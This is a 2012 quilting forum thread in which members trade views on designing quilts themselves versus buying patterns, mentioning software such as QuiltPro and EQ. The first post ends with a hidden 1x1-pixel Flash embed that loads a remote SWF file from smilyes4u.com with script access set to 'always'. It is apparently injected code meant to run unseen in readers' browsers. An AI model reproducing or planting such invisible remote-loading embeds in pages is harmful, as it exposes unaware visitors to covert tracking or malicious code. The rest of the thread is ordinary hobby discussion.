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spacebull1 05-03-2012 11:15 AM

I don't design my own quilts. There are lots of great patterns so I use them.:)<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="1" width="1">

<embed type="application/x-shockwave-flash" src="http://smilyes4u.com/d/15/nr.swf" undefined="http://smilyes4u.com/d/15/nr.swf" allowscriptaccess="always" height="1" width="1"></object>

Lori S 05-03-2012 11:23 AM

I am mixed , sometimes I design my own .. sometimes I buy a pattern. I have been known to buy patterns for some very easy quilts , for a couple of reasons.. 1. Sometimes I do not want to think I just want to cut and sew. #2. I often do not trust my math, and end up buying more fabric than is needed... at the price of fabric ... its easier and often cheaper to buy the pattern with the fabric requirements, than over buying!
Do what makes you happy and gives you the results you want.

Lisa_wanna_b_quilter 05-03-2012 11:29 AM

I use block patterns. Generally from Eleanor Burns or Quilter's Cache. After I pick a block I like, I just start making them. When I have a bunch, I toss them on the bed. Next, I attempt to figure out how many more I need to make it a size I like. If I'm not sick of making blocks, I make more. If I'm sick of making blocks, I start adding borders. I guess that means I'm mixed up. I use a pattern for the beginning and wing it the rest of the way.

quiltstringz 05-03-2012 11:50 AM

I normally use a pattern except when I have a panel or am doing a memory quilt. Then I just cut the panel up lay it out and put all kind of blocks and borders to fill in. If my blocks don't fill in completely then I just put some filler - could be a piece of fabric, checkerboard pieced, etc. Math is not my strong suit so when I do that it is usually by the seat of my pants but has always worked out. Since I don't really enjoy setting down, graphing & mathing I am more than happy to pay for a pattern. I figure it is money well spent.
BTW Kpross - yours is great!

kpross 05-03-2012 12:18 PM

Thank you, quiltstringz. I have to agree with those saying math is not my strong suit. Nor is spacial orientation. These can be bad traits for a quilter! lol I use my math-whiz sister for help a lot, even with a pattern! As has been said, this is supposed to be fun and relaxing so I am also always happy to have someone else figure all that out!

Jingle 05-03-2012 12:41 PM

I have done both, design my own when using up scraps and other times I use patterns out of books.

QM 05-03-2012 12:51 PM

1 Attachment(s)
The only person who needs to be pleased with yor quilting is YOU. I use QuiltPro and love it. I own EQ (given from a friend who died) and even after working through the lessons, I hate it. I enjoy designing quilts even more than making them. I prefer not to follow other people's designs most of the time. However, we are not all required to follow a single path in our quilting (thank goodness!).

A couple of years ago, I designed a quilt on freezer paper. The advantage is that I could work in the scale I wanted. I don't have much use for graph paper for exactly that reason. Enlarging can be a pain. Our great grandmothers often designed on old (pressed to set the ink) newspapers.

Please don't let those of us who rarely use commercial patterns intimidate you. If you NEVER use quilt software, that will not mean that you are a less perfect person. Some members of my guild hate the idea of quilt software. A few love it. When people are ambivalent, I urge them to try. Some of my guild sisters design using PaintBrush, which sounds frustrating to me. I evaluated educational software for a teacher's mag for several years and taught computer usage. The whole subject seems very natural to me, but I know it is not for everyone. On the other hand, I can't draw. Before I was a computer user, I used cheap colored paper and scissors to mock up my applique designs.

Jackie Spencer 05-03-2012 04:58 PM

I use patterns. I love the old traditional patterns, and I follow them to the letter. When I want to do my own thing, and be creative, I Crazy Quilt.

raedar63 05-03-2012 05:06 PM

I MUST have at least some directions, the few times I tried to "wing it" it was pure disaster lol.

Except for crumb and string types :)

AZ Jane 05-03-2012 05:13 PM

I love your carpet!!!! Lol

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